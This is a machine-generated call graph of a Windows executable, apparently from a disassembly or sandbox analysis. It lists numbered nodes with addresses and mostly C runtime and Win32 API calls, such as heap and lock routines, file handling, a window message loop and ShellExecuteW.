95252 152a7b GetModuleFileNameW 95246->95252 95364 1469d0 47 API calls __crtLCMapStringA_stat 95247->95364 95250 152eca FreeEnvironmentStringsW 95250->95246 95251 152eb4 ___crtGetEnvironmentStringsW 95251->95250 95253 152aaf _wparse_cmdline 95252->95253 95254 145eb7 95253->95254 95255 152ae9 95253->95255 95254->95186 95292 14115b 47 API calls 3 library calls 95254->95292 95365 1469d0 47 API calls __crtLCMapStringA_stat 95255->95365 95257 152aef _wparse_cmdline 95257->95254 95259 152ccd __wsetenvp 95258->95259 95263 152cc5 95258->95263 95260 146986 __calloc_crt 47 API calls 95259->95260 95268 152cf6 __wsetenvp 95260->95268 95261 152d4d 95262 141c9d _free 47 API calls 95261->95262 95262->95263 95263->95189 95264 146986 __calloc_crt 47 API calls 95264->95268 95265 152d72 95266 141c9d _free 47 API calls 95265->95266 95266->95263 95268->95261 95268->95263 95268->95264 95268->95265 95269 152d89 95268->95269 95366 152567 47 API calls __wcsnicmp 95268->95366 95367 146e20 IsProcessorFeaturePresent 95269->95367 95271 152d95 95271->95189 95273 1411a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95272->95273 95275 1411e0 __IsNonwritableInCurrentImage 95273->95275 95390 140f0a 52 API calls __cinit 95273->95390 95275->95193 95277 191ebf 95276->95277 95278 123a29 95276->95278 95279 123a63 IsThemeActive 95278->95279 95391 141405 95279->95391 95283 123a8f 95403 123adb SystemParametersInfoW SystemParametersInfoW 95283->95403 95285 123a9b 95404 123d19 95285->95404 95287 123aa3 SystemParametersInfoW 95288 123ac8 95287->95288 95288->95197 95289->95171 95290->95176 95291->95182 95295->95198 95296->95201 95297->95207 95298->95209 95299->95213 95300->95214 95302 14698d 95301->95302 95304 1469ca 95302->95304 95305 1469ab Sleep 95302->95305 95310 1530aa 95302->95310 95304->95218 95307 147ec9 TlsSetValue 95304->95307 95306 1469c2 95305->95306 95306->95302 95306->95304 95307->95221 95308->95225 95309->95222 95311 1530b5 95310->95311 95315 1530d0 __calloc_impl 95310->95315 95312 1530c1 95311->95312 95311->95315 95317 147c0e 47 API calls __getptd_noexit 95312->95317 95313 1530e0 HeapAlloc 95313->95315 95316 1530c6 95313->95316 95315->95313 95315->95316 95316->95302 95317->95316 95319 147d05 95318->95319 95320 147d18 EnterCriticalSection 95318->95320 95326 147d7c 95319->95326 95320->95229 95322 147d0b 95322->95320 95350 14115b 47 API calls 3 library calls 95322->95350 95325->95233 95327 147d88 _fprintf 95326->95327 95328 147d91 95327->95328 95329 147da9 95327->95329 95351 1481c2 47 API calls 2 library calls 95328->95351 95336 147e11 _fprintf 95329->95336 95344 147da7 95329->95344 95331 147d96 95352 14821f 47 API calls 8 library calls 95331->95352 95334 147dbd 95337 147dc4 95334->95337 95338 147dd3 95334->95338 95335 147d9d 95353 141145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95335->95353 95336->95322 95355 147c0e 47 API calls __getptd_noexit 95337->95355 95339 147cf4 __lock 46 API calls 95338->95339 95343 147dda 95339->95343 95342 147dc9 95342->95336 95345 147dfe 95343->95345 95346 147de9 InitializeCriticalSectionAndSpinCount 95343->95346 95344->95329 95354 1469d0 47 API calls __crtLCMapStringA_stat 95344->95354 95356 141c9d 95345->95356 95347 147e04 95346->95347 95362 147e1a LeaveCriticalSection _doexit 95347->95362 95351->95331 95352->95335 95354->95334 95355->95342 95357 141ca6 RtlFreeHeap 95356->95357 95361 141ccf _free 95356->95361 95358 141cbb 95357->95358 95357->95361 95363 147c0e 47 API calls __getptd_noexit 95358->95363 95360 141cc1 GetLastError 95360->95361 95361->95347 95362->95336 95363->95360 95364->95251 95365->95257 95366->95268 95368 146e2b 95367->95368 95373 146cb5 95368->95373 95372 146e46 95372->95271 95374 146ccf _memset __call_reportfault 95373->95374 95375 146cef IsDebuggerPresent 95374->95375 95381 1481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95375->95381 95378 146db3 __call_reportfault 95382 14a70c 95378->95382 95379 146dd6 95380 148197 GetCurrentProcess TerminateProcess 95379->95380 95380->95372 95381->95378 95383 14a714 95382->95383 95384 14a716 IsProcessorFeaturePresent 95382->95384 95383->95379 95386 1537b0 95384->95386 95389 15375f 5 API calls 2 library calls 95386->95389 95388 153893 95388->95379 95389->95388 95390->95275 95392 147cf4 __lock 47 API calls 95391->95392 95393 141410 95392->95393 95456 147e58 LeaveCriticalSection 95393->95456 95395 123a88 95396 14146d 95395->95396 95397 141477 95396->95397 95398 141491 95396->95398 95397->95398 95457 147c0e 47 API calls __getptd_noexit 95397->95457 95398->95283 95400 141481 95458 146e10 8 API calls __wcsnicmp 95400->95458 95402 14148c 95402->95283 95403->95285 95405 123d26 __ftell_nolock 95404->95405 95406 12d7f7 48 API calls 95405->95406 95407 123d31 GetCurrentDirectoryW 95406->95407 95459 1261ca 95407->95459 95409 123d57 IsDebuggerPresent 95410 123d65 95409->95410 95411 191cc1 MessageBoxA 95409->95411 95412 123e3a 95410->95412 95414 191cd9 95410->95414 95415 123d82 95410->95415 95411->95414 95413 123e41 SetCurrentDirectoryW 95412->95413 95416 123e4e Mailbox 95413->95416 95636 13c682 48 API calls 95414->95636 95533 1240e5 95415->95533 95416->95287 95419 191ce9 95424 191cff SetCurrentDirectoryW 95419->95424 95421 123da0 GetFullPathNameW 95422 126a63 48 API calls 95421->95422 95423 123ddb 95422->95423 95549 126430 95423->95549 95424->95416 95427 123df6 95428 123e00 95427->95428 95637 1671fa AllocateAndInitializeSid CheckTokenMembership FreeSid 95427->95637 95565 123e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 95428->95565 95431 191d1c 95431->95428 95434 191d2d 95431->95434 95435 125374 50 API calls 95434->95435 95438 191d35 95435->95438 95436 123e0a 95437 123e1f 95436->95437 95634 124ffc 67 API calls _memset 95436->95634 95573 12e8d0 95437->95573 95441 12ce19 48 API calls 95438->95441 95443 191d42 95441->95443 95445 191d49 95443->95445 95446 191d6e 95443->95446 95448 12518c 48 API calls 95445->95448 95447 12518c 48 API calls 95446->95447 95449 191d6a GetForegroundWindow ShellExecuteW 95447->95449 95450 191d54 95448->95450 95454 191d9e Mailbox 95449->95454 95452 12510d 48 API calls 95450->95452 95453 191d61 95452->95453 95455 12518c 48 API calls 95453->95455 95454->95412 95455->95449 95456->95395 95457->95400 95458->95402 95638 13e99b 95459->95638 95463 1261eb 95464 125374 50 API calls 95463->95464 95465 1261ff 95464->95465 95466 12ce19 48 API calls 95465->95466 95467 12620c 95466->95467 95655 1239db 95467->95655 95469 126216 Mailbox 95470 126eed 48 API calls 95469->95470 95471 12622b 95470->95471 95667 129048 95471->95667 95474 12ce19 48 API calls 95475 126244 95474->95475 95670 12d6e9 95475->95670 95477 126254 Mailbox 95478 12ce19 48 API calls 95477->95478 95479 12627c 95478->95479 95480 12d6e9 55 API calls 95479->95480 95481 12628f Mailbox 95480->95481 95482 12ce19 48 API calls 95481->95482 95483 1262a0 95482->95483 95674 12d645 95483->95674 95485 1262b2 Mailbox 95486 12d7f7 48 API calls 95485->95486 95487 1262c5 95486->95487 95684 1263fc 95487->95684 95491 1262df 95492 191c08 95491->95492 95493 1262e9 95491->95493 95495 1263fc 48 API calls 95492->95495 95494 140fa7 _W_store_winword 59 API calls 95493->95494 95497 1262f4 95494->95497 95496 191c1c 95495->95496 95499 1263fc 48 API calls 95496->95499 95497->95496 95498 1262fe 95497->95498 95500 140fa7 _W_store_winword 59 API calls 95498->95500 95503 191c38 95499->95503 95501 126309 95500->95501 95502 126313 95501->95502 95501->95503 95505 140fa7 _W_store_winword 59 API calls 95502->95505 95504 125374 50 API calls 95503->95504 95506 191c5d 95504->95506 95507 12631e 95505->95507 95508 1263fc 48 API calls 95506->95508 95509 12635f 95507->95509 95510 191c86 95507->95510 95513 1263fc 48 API calls 95507->95513 95512 191c69 95508->95512 95509->95510 95511 12636c 95509->95511 95514 126eed 48 API calls 95510->95514 95700 13c050 95511->95700 95515 126eed 48 API calls 95512->95515 95516 126342 95513->95516 95517 191ca8 95514->95517 95519 191c77 95515->95519 95520 126eed 48 API calls 95516->95520 95521 1263fc 48 API calls 95517->95521 95523 1263fc 48 API calls 95519->95523 95524 126350 95520->95524 95525 191cb5 95521->95525 95522 126384 95711 131b90 95522->95711 95523->95510 95527 1263fc 48 API calls 95524->95527 95525->95525 95527->95509 95528 131b90 48 API calls 95530 126394 95528->95530 95530->95528 95531 1263fc 48 API calls 95530->95531 95532 1263d6 Mailbox 95530->95532 95727 126b68 48 API calls 95530->95727 95531->95530 95532->95409 95534 1240f2 __ftell_nolock 95533->95534 95535 19370e _memset 95534->95535 95536 12410b 95534->95536 95538 19372a GetOpenFileNameW 95535->95538 95537 12660f 49 API calls 95536->95537 95539 124114 95537->95539 95540 193779 95538->95540 96209 1240a7 95539->96209 95542 126a63 48 API calls 95540->95542 95544 19378e 95542->95544 95544->95544 95546 124129 96227 124139 95546->96227 95550 12643d __ftell_nolock 95549->95550 96432 124c75 95550->96432 95552 126442 95564 123dee 95552->95564 96443 125928 86 API calls 95552->96443 95554 12644f 95554->95564 96444 125798 88 API calls Mailbox 95554->96444 95556 126458 95557 12645c GetFullPathNameW 95556->95557 95556->95564 95558 126a63 48 API calls 95557->95558 95559 126488 95558->95559 95560 126a63 48 API calls 95559->95560 95561 126495 95560->95561 95562 126a63 48 API calls 95561->95562 95563 195dcf _wcscat 95561->95563 95562->95564 95564->95419 95564->95427 95566 191cba 95565->95566 95567 123ed8 95565->95567 96448 124024 95567->96448 95571 123e05 95572 1236b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95571->95572 95572->95436 95574 12e8f6 95573->95574 95633 12e906 Mailbox 95573->95633 95575 12ed52 95574->95575 95574->95633 96549 13e3cd 342 API calls 95575->96549 95576 16cc5c 86 API calls 95576->95633 95578 123e2a 95578->95412 95635 123847 Shell_NotifyIconW _memset 95578->95635 95580 12ed63 95580->95578 95582 12ed70 95580->95582 95581 12e94c PeekMessageW 95581->95633 96551 13e312 342 API calls Mailbox 95582->96551 95584 19526e Sleep 95584->95633 95585 12ed77 LockWindowUpdate DestroyWindow GetMessageW 95585->95578 95588 12eda9 95585->95588 95587 12ebc7 95587->95578 96550 122ff6 16 API calls 95587->96550 95590 1959ef TranslateMessage DispatchMessageW GetMessageW 95588->95590 95590->95590 95591 195a1f 95590->95591 95591->95578 95592 12ed21 PeekMessageW 95592->95633 95593 13f4ea 48 API calls 95593->95633 95594 12ebf7 timeGetTime 95594->95633 95596 126eed 48 API calls 95596->95633 95597 195557 WaitForSingleObject 95600 195574 GetExitCodeProcess CloseHandle 95597->95600 95597->95633 95598 12ed3a TranslateMessage DispatchMessageW 95598->95592 95599 122aae 318 API calls 95599->95633 95600->95633 95601 19588f Sleep 95629 195429 Mailbox 95601->95629 95602 12d7f7 48 API calls 95602->95629 95603 12edae timeGetTime 96552 121caa 49 API calls 95603->96552 95606 195733 Sleep 95606->95629 95608 13dc38 timeGetTime 95608->95629 95609 195926 GetExitCodeProcess 95611 19593c WaitForSingleObject 95609->95611 95612 195952 CloseHandle 95609->95612 95611->95612 95611->95633 95612->95629 95613 195445 Sleep 95613->95633 95615 122c79 107 API calls 95615->95629 95616 195432 Sleep 95616->95613 95617 188c4b 108 API calls 95617->95629 95618 1959ae Sleep 95618->95633 95619 121caa 49 API calls 95619->95633 95620 12ce19 48 API calls 95620->95629 95625 12d6e9 55 API calls 95625->95629 95629->95602 95629->95608 95629->95609 95629->95613 95629->95615 95629->95616 95629->95617 95629->95618 95629->95620 95629->95625 95629->95633 96554 164cbe 49 API calls Mailbox 95629->96554 96555 121caa 49 API calls 95629->96555 96556 122aae 342 API calls 95629->96556 96558 17ccb2 50 API calls 95629->96558 96559 167a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95629->96559 96560 166532 63 API calls 3 library calls 95629->96560 95630 12ce19 48 API calls 95630->95633 95632 12d6e9 55 API calls 95632->95633 95633->95576 95633->95581 95633->95584 95633->95587 95633->95592 95633->95593 95633->95594 95633->95596 95633->95597 95633->95598 95633->95599 95633->95601 95633->95603 95633->95606 95633->95613 95633->95619 95633->95629 95633->95630 95633->95632 96453 12f110 95633->96453 96518 1345e0 95633->96518 96536 13e244 95633->96536 96541 13dc5f 95633->96541 96546 12eed0 342 API calls Mailbox 95633->96546 96547 12ef00 342 API calls 95633->96547 96548 133200 342 API calls 2 library calls 95633->96548 96553 188d23 48 API calls 95633->96553 96557 12fe30 342 API calls __cinit 95633->96557 95634->95437 95635->95412 95636->95419 95637->95431 95639 12d7f7 48 API calls 95638->95639 95640 1261db 95639->95640 95641 126009 95640->95641 95642 126016 __ftell_nolock 95641->95642 95643 126a63 48 API calls 95642->95643 95654 12617c Mailbox 95642->95654 95645 126048 95643->95645 95647 12607e Mailbox 95645->95647 95728 1261a6 95645->95728 95646 12614f 95648 12ce19 48 API calls 95646->95648 95646->95654 95647->95646 95650 12ce19 48 API calls 95647->95650 95652 1261a6 48 API calls 95647->95652 95653 1264cf 48 API calls 95647->95653 95647->95654 95649 126170 95648->95649 95651 1264cf 48 API calls 95649->95651 95650->95647 95651->95654 95652->95647 95653->95647 95654->95463 95731 1241a9 95655->95731 95658 123a06 95658->95469 95661 192ff0 95663 141c9d _free 47 API calls 95661->95663 95664 192ffd 95663->95664 95665 124252 84 API calls 95664->95665 95666 193006 95665->95666 95666->95666 95668 13f4ea 48 API calls 95667->95668 95669 126237 95668->95669 95669->95474 95671 12d6f4 95670->95671 95672 12d71b 95671->95672 96198 12d764 55 API calls 95671->96198 95672->95477 95675 12d654 95674->95675 95683 12d67e 95674->95683 95677 12d65b 95675->95677 95678 12d6c2 95675->95678 95676 12d6ab 95676->95683 96200 13dce0 53 API calls 95676->96200 95677->95676 95679 12d666 95677->95679 95678->95676 96201 13dce0 53 API calls 95678->96201 96199 12d9a0 53 API calls __cinit 95679->96199 95683->95485 95685 126406 95684->95685 95686 12641f 95684->95686 95688 126eed 48 API calls 95685->95688 95687 126a63 48 API calls 95686->95687 95689 1262d1 95687->95689 95688->95689 95690 140fa7 95689->95690 95691 140fb3 95690->95691 95692 141028 95690->95692 95699 140fd8 95691->95699 96202 147c0e 47 API calls __getptd_noexit 95691->96202 96204 14103a 59 API calls 3 library calls 95692->96204 95694 141035 95694->95491 95696 140fbf 96203 146e10 8 API calls __wcsnicmp 95696->96203 95698 140fca 95698->95491 95699->95491 95701 13c064 95700->95701 95703 13c069 Mailbox 95700->95703 96205 13c1af 48 API calls 95701->96205 95708 13c077 95703->95708 96206 13c15c 48 API calls 95703->96206 95705 13f4ea 48 API calls 95707 13c108 95705->95707 95706 13c152 95706->95522 95709 13f4ea 48 API calls 95707->95709 95708->95705 95708->95706 95710 13c113 95709->95710 95710->95522 95712 131cf6 95711->95712 95714 131ba2 95711->95714 95712->95530 95715 13f4ea 48 API calls 95714->95715 95725 131bae 95714->95725 95716 1949c4 95715->95716 95717 13f4ea 48 API calls 95716->95717 95726 1949cf 95717->95726 95718 131bb9 95719 131c5d 95718->95719 95720 13f4ea 48 API calls 95718->95720 95719->95530 95721 131c9f 95720->95721 95722 131cb2 95721->95722 96207 122925 48 API calls 95721->96207 95722->95530 95724 13f4ea 48 API calls 95724->95726 95725->95718 96208 13c15c 48 API calls 95725->96208 95726->95724 95726->95725 95727->95530 95729 12bdfa 48 API calls 95728->95729 95730 1261b1 95729->95730 95730->95645 95796 124214 95731->95796 95736 1241d4 LoadLibraryExW 95806 124291 95736->95806 95737 194f73 95739 124252 84 API calls 95737->95739 95741 194f7a 95739->95741 95743 124291 3 API calls 95741->95743 95745 194f82 95743->95745 95744 1241fb 95744->95745 95746 124207 95744->95746 95832 1244ed 95745->95832 95748 124252 84 API calls 95746->95748 95750 1239fe 95748->95750 95750->95658 95755 16c396 95750->95755 95752 194fa9 95840 124950 95752->95840 95754 194fb6 95756 124517 83 API calls 95755->95756 95757 16c405 95756->95757 96018 16c56d 95757->96018 95760 1244ed 64 API calls 95761 16c432 95760->95761 95762 1244ed 64 API calls 95761->95762 95763 16c442 95762->95763 95764 1244ed 64 API calls 95763->95764 95765 16c45d 95764->95765 95766 1244ed 64 API calls 95765->95766 95767 16c478 95766->95767 95768 124517 83 API calls 95767->95768 95769 16c48f 95768->95769 95770 14395c __crtLCMapStringA_stat 47 API calls 95769->95770 95771 16c496 95770->95771 95772 14395c __crtLCMapStringA_stat 47 API calls 95771->95772 95773 16c4a0 95772->95773 95774 1244ed 64 API calls 95773->95774 95775 16c4b4 95774->95775 95776 16bf5a GetSystemTimeAsFileTime 95775->95776 95777 16c4c7 95776->95777 95778 16c4f1 95777->95778 95779 16c4dc 95777->95779 95780 16c556 95778->95780 95781 16c4f7 95778->95781 95782 141c9d _free 47 API calls 95779->95782 95785 141c9d _free 47 API calls 95780->95785 96024 16b965 95781->96024 95783 16c4e2 95782->95783 95786 141c9d _free 47 API calls 95783->95786 95788 16c41b 95785->95788 95786->95788 95788->95661 95790 124252 95788->95790 95789 141c9d _free 47 API calls 95789->95788 95791 124263 95790->95791 95792 12425c 95790->95792 95794 124272 95791->95794 95795 124283 FreeLibrary 95791->95795 95793 1435e4 __fcloseall 83 API calls 95792->95793 95793->95791 95794->95661 95795->95794 95845 124339 95796->95845 95799 12423c 95801 124244 FreeLibrary 95799->95801 95802 1241bb 95799->95802 95801->95802 95803 143499 95802->95803 95853 1434ae 95803->95853 95805 1241c8 95805->95736 95805->95737 95932 1242e4 95806->95932 95808 1242b8 95811 1242c1 FreeLibrary 95808->95811 95812 1241ec 95808->95812 95811->95812 95813 124380 95812->95813 95814 13f4ea 48 API calls 95813->95814 95815 124395 95814->95815 95816 1247b7 48 API calls 95815->95816 95817 1243a1 ___crtGetEnvironmentStringsW 95816->95817 95818 1243dc 95817->95818 95819 1244d1 95817->95819 95820 124499 95817->95820 95821 124950 57 API calls 95818->95821 95951 16c750 93 API calls 95819->95951 95940 12406b CreateStreamOnHGlobal 95820->95940 95829 1243e5 95821->95829 95824 1244ed 64 API calls 95824->95829 95825 124479 95825->95744 95827 194ed7 95828 124517 83 API calls 95827->95828 95830 194eeb 95828->95830 95829->95824 95829->95825 95829->95827 95946 124517 95829->95946 95831 1244ed 64 API calls 95830->95831 95831->95825 95833 194fc0 95832->95833 95834 1244ff 95832->95834 95975 14381e 95834->95975 95837 16bf5a 95995 16bdb4 95837->95995 95839 16bf70 95839->95752 95841 195002 95840->95841 95842 12495f 95840->95842 96000 143e65 95842->96000 95844 124967 95844->95754 95849 12434b 95845->95849 95848 124321 LoadLibraryA GetProcAddress 95848->95799 95850 12422f 95849->95850 95851 124354 LoadLibraryA 95849->95851 95850->95799 95850->95848 95851->95850 95852 124365 GetProcAddress 95851->95852 95852->95850 95856 1434ba _fprintf 95853->95856 95854 1434cd 95901 147c0e 47 API calls __getptd_noexit 95854->95901 95856->95854 95858 1434fe 95856->95858 95857 1434d2 95902 146e10 8 API calls __wcsnicmp 95857->95902 95872 14e4c8 95858->95872 95861 143503 95862 14350c 95861->95862 95863 143519 95861->95863 95903 147c0e 47 API calls __getptd_noexit 95862->95903 95865 143543 95863->95865 95866 143523 95863->95866 95886 14e5e0 95865->95886 95904 147c0e 47 API calls __getptd_noexit 95866->95904 95868 1434dd @_EH4_CallFilterFunc@8 _fprintf 95868->95805 95873 14e4d4 _fprintf 95872->95873 95874 147cf4 __lock 47 API calls 95873->95874 95882 14e4e2 95874->95882 95875 14e552 95906 14e5d7 95875->95906 95876 14e559 95911 1469d0 47 API calls __crtLCMapStringA_stat 95876->95911 95879 14e560 95879->95875 95881 14e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95879->95881 95880 14e5cc _fprintf 95880->95861 95881->95875 95882->95875 95882->95876 95883 147d7c __mtinitlocknum 47 API calls 95882->95883 95909 144e5b 48 API calls __lock 95882->95909 95910 144ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95882->95910 95883->95882 95887 14e600 __wopenfile 95886->95887 95888 14e61a 95887->95888 95900 14e7d5 95887->95900 95918 14185b 59 API calls 2 library calls 95887->95918 95916 147c0e 47 API calls __getptd_noexit 95888->95916 95890 14e61f 95917 146e10 8 API calls __wcsnicmp 95890->95917 95892 14e838 95913 1563c9 95892->95913 95893 14354e 95905 143570 LeaveCriticalSection LeaveCriticalSection _fprintf 95893->95905 95896 14e7ce 95896->95900 95919 14185b 59 API calls 2 library calls 95896->95919 95898 14e7ed 95898->95900 95920 14185b 59 API calls 2 library calls 95898->95920 95900->95888 95900->95892 95901->95857 95902->95868 95903->95868 95904->95868 95905->95868 95912 147e58 LeaveCriticalSection 95906->95912 95908 14e5de 95908->95880 95909->95882 95910->95882 95911->95879 95912->95908 95921 155bb1 95913->95921 95915 1563e2 95915->95893 95916->95890 95917->95893 95918->95896 95919->95898 95920->95900 95924 155bbd _fprintf 95921->95924 95922 155bcf 95923 147c0e __wcsnicmp 47 API calls 95922->95923 95925 155bd4 95923->95925 95924->95922 95926 155c06 95924->95926 95927 146e10 __wcsnicmp 8 API calls 95925->95927 95928 155c78 __wsopen_helper 110 API calls 95926->95928 95931 155bde _fprintf 95927->95931 95929 155c23 95928->95929 95930 155c4c __wsopen_helper LeaveCriticalSection 95929->95930 95930->95931 95931->95915 95936 1242f6 95932->95936 95935 1242cc LoadLibraryA GetProcAddress 95935->95808 95937 1242aa 95936->95937 95938 1242ff LoadLibraryA 95936->95938 95937->95808 95937->95935 95938->95937 95939 124310 GetProcAddress 95938->95939 95939->95937 95941 1240a2 95940->95941 95942 124085 FindResourceExW 95940->95942 95941->95818 95942->95941 95943 194f16 LoadResource 95942->95943 95943->95941 95944 194f2b SizeofResource 95943->95944 95944->95941 95945 194f3f LockResource 95944->95945 95945->95941 95947 124526 95946->95947 95948 194fe0 95946->95948 95952 143a8d 95947->95952 95950 124534 95950->95829 95951->95818 95954 143a99 _fprintf 95952->95954 95953 143aa7 95965 147c0e 47 API calls __getptd_noexit 95953->95965 95954->95953 95955 143acd 95954->95955 95967 144e1c 95955->95967 95958 143aac 95966 146e10 8 API calls __wcsnicmp 95958->95966 95959 143ad3 95973 1439fe 81 API calls 3 library calls 95959->95973 95962 143ab7 _fprintf 95962->95950 95963 143ae2 95974 143b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95963->95974 95965->95958 95966->95962 95968 144e2c 95967->95968 95969 144e4e EnterCriticalSection 95967->95969 95968->95969 95970 144e34 95968->95970 95971 144e44 95969->95971 95972 147cf4 __lock 47 API calls 95970->95972 95971->95959 95972->95971 95973->95963 95974->95962 95978 143839 95975->95978 95977 124510 95977->95837 95979 143845 _fprintf 95978->95979 95980 143888 95979->95980 95981 143880 _fprintf 95979->95981 95983 14385b _memset 95979->95983 95982 144e1c __lock_file 48 API calls 95980->95982 95981->95977 95985 14388e 95982->95985 95991 147c0e 47 API calls __getptd_noexit 95983->95991 95993 14365b 62 API calls 6 library calls 95985->95993 95986 143875 95992 146e10 8 API calls __wcsnicmp 95986->95992 95989 1438a4 95994 1438c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95989->95994 95991->95986 95992->95981 95993->95989 95994->95981 95998 14344a GetSystemTimeAsFileTime 95995->95998 95997 16bdc3 95997->95839 95999 143478 __aulldiv 95998->95999 95999->95997 96001 143e71 _fprintf 96000->96001 96002 143e94 96001->96002 96003 143e7f 96001->96003 96005 144e1c __lock_file 48 API calls 96002->96005 96014 147c0e 47 API calls __getptd_noexit 96003->96014 96006 143e9a 96005->96006 96016 143b0c 55 API calls 4 library calls 96006->96016 96007 143e84 96015 146e10 8 API calls __wcsnicmp 96007->96015 96010 143ea5 96017 143ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 96010->96017 96012 143eb7 96013 143e8f _fprintf 96012->96013 96013->95844 96014->96007 96015->96013 96016->96010 96017->96012 96019 16c581 __tzset_nolock _wcscmp 96018->96019 96020 1244ed 64 API calls 96019->96020 96021 16c417 96019->96021 96022 16bf5a GetSystemTimeAsFileTime 96019->96022 96023 124517 83 API calls 96019->96023 96020->96019 96021->95760 96021->95788 96022->96019 96023->96019 96025 16b970 96024->96025 96026 16b97e 96024->96026 96027 143499 117 API calls 96025->96027 96028 16b9c3 96026->96028 96029 143499 117 API calls 96026->96029 96051 16b987 96026->96051 96027->96026 96055 16bbe8 64 API calls 3 library calls 96028->96055 96030 16b9a8 96029->96030 96030->96028 96032 16b9b1 96030->96032 96032->96051 96066 1435e4 96032->96066 96033 16ba07 96034 16ba2c 96033->96034 96035 16ba0b 96033->96035 96056 16b7e5 47 API calls __crtLCMapStringA_stat 96034->96056 96038 16ba18 96035->96038 96040 1435e4 __fcloseall 83 API calls 96035->96040 96041 1435e4 __fcloseall 83 API calls 96038->96041 96038->96051 96039 16ba34 96042 16ba5a 96039->96042 96043 16ba3a 96039->96043 96040->96038 96041->96051 96057 16ba8a 90 API calls 96042->96057 96045 16ba47 96043->96045 96047 1435e4 __fcloseall 83 API calls 96043->96047 96049 1435e4 __fcloseall 83 API calls 96045->96049 96045->96051 96046 16ba61 96058 16bb64 96046->96058 96047->96045 96049->96051 96051->95789 96052 16ba75 96052->96051 96054 1435e4 __fcloseall 83 API calls 96052->96054 96053 1435e4 __fcloseall 83 API calls 96053->96052 96054->96051 96055->96033 96056->96039 96057->96046 96059 16bb71 96058->96059 96060 16bb77 96058->96060 96061 141c9d _free 47 API calls 96059->96061 96062 141c9d _free 47 API calls 96060->96062 96063 16bb88 96060->96063 96061->96060 96062->96063 96064 141c9d _free 47 API calls 96063->96064 96065 16ba68 96063->96065 96064->96065 96065->96052 96065->96053 96067 1435f0 _fprintf 96066->96067 96068 143604 96067->96068 96069 14361c 96067->96069 96095 147c0e 47 API calls __getptd_noexit 96068->96095 96072 144e1c __lock_file 48 API calls 96069->96072 96075 143614 _fprintf 96069->96075 96071 143609 96096 146e10 8 API calls __wcsnicmp 96071->96096 96074 14362e 96072->96074 96079 143578 96074->96079 96075->96051 96080 143587 96079->96080 96081 14359b 96079->96081 96138 147c0e 47 API calls __getptd_noexit 96080->96138 96082 143597 96081->96082 96098 142c84 96081->96098 96097 143653 LeaveCriticalSection LeaveCriticalSection _fprintf 96082->96097 96085 14358c 96139 146e10 8 API calls __wcsnicmp 96085->96139 96091 1435b5 96115 14e9d2 96091->96115 96093 1435bb 96093->96082 96094 141c9d _free 47 API calls 96093->96094 96094->96082 96095->96071 96096->96075 96097->96075 96099 142cbb 96098->96099 96100 142c97 96098->96100 96104 14eb36 96099->96104 96100->96099 96101 142933 __ftell_nolock 47 API calls 96100->96101 96102 142cb4 96101->96102 96140 14af61 96102->96140 96105 14eb43 96104->96105 96107 1435af 96104->96107 96106 141c9d _free 47 API calls 96105->96106 96105->96107 96106->96107 96108 142933 96107->96108 96109 142952 96108->96109 96110 14293d 96108->96110 96109->96091 96165 147c0e 47 API calls __getptd_noexit 96110->96165 96112 142942 96166 146e10 8 API calls __wcsnicmp 96112->96166 96114 14294d 96114->96091 96116 14e9de _fprintf 96115->96116 96117 14e9e6 96116->96117 96118 14e9fe 96116->96118 96191 147bda 47 API calls __getptd_noexit 96117->96191 96120 14ea7b 96118->96120 96123 14ea28 96118->96123 96195 147bda 47 API calls __getptd_noexit 96120->96195 96121 14e9eb 96192 147c0e 47 API calls __getptd_noexit 96121->96192 96167 14a8ed 96123->96167 96125 14ea80 96196 147c0e 47 API calls __getptd_noexit 96125->96196 96128 14ea88 96197 146e10 8 API calls __wcsnicmp 96128->96197 96129 14ea2e 96131 14ea41 96129->96131 96132 14ea4c 96129->96132 96176 14ea9c 96131->96176 96193 147c0e 47 API calls __getptd_noexit 96132->96193 96134 14e9f3 _fprintf 96134->96093 96136 14ea47 96194 14ea73 LeaveCriticalSection __unlock_fhandle 96136->96194 96138->96085 96139->96082 96141 14af6d _fprintf 96140->96141 96142 14af75 96141->96142 96143 14af8d 96141->96143 96144 147bda __free_osfhnd 47 API calls 96142->96144 96145 14b022 96143->96145 96149 14afbf 96143->96149 96146 14af7a 96144->96146 96147 147bda __free_osfhnd 47 API calls 96145->96147 96148 147c0e __wcsnicmp 47 API calls 96146->96148 96150 14b027 96147->96150 96160 14af82 _fprintf 96148->96160 96151 14a8ed ___lock_fhandle 49 API calls 96149->96151 96152 147c0e __wcsnicmp 47 API calls 96150->96152 96153 14afc5 96151->96153 96154 14b02f 96152->96154 96155 14afd8 96153->96155 96156 14afeb 96153->96156 96157 146e10 __wcsnicmp 8 API calls 96154->96157 96159 14b043 __chsize_nolock 75 API calls 96155->96159 96158 147c0e __wcsnicmp 47 API calls 96156->96158 96157->96160 96161 14aff0 96158->96161 96162 14afe4 96159->96162 96160->96099 96163 147bda __free_osfhnd 47 API calls 96161->96163 96164 14b01a __flush LeaveCriticalSection 96162->96164 96163->96162 96164->96160 96165->96112 96166->96114 96168 14a8f9 _fprintf 96167->96168 96169 14a946 EnterCriticalSection 96168->96169 96171 147cf4 __lock 47 API calls 96168->96171 96170 14a96c _fprintf 96169->96170 96170->96129 96172 14a91d 96171->96172 96173 14a928 InitializeCriticalSectionAndSpinCount 96172->96173 96174 14a93a 96172->96174 96173->96174 96175 14a970 ___lock_fhandle LeaveCriticalSection 96174->96175 96175->96169 96177 14aba4 __close_nolock 47 API calls 96176->96177 96180 14eaaa 96177->96180 96178 14eb00 96179 14ab1e __free_osfhnd 48 API calls 96178->96179 96183 14eb08 96179->96183 96180->96178 96181 14aba4 __close_nolock 47 API calls 96180->96181 96190 14eade 96180->96190 96185 14ead5 96181->96185 96182 14aba4 __close_nolock 47 API calls 96186 14eaea CloseHandle 96182->96186 96184 14eb2a 96183->96184 96187 147bed __dosmaperr 47 API calls 96183->96187 96184->96136 96188 14aba4 __close_nolock 47 API calls 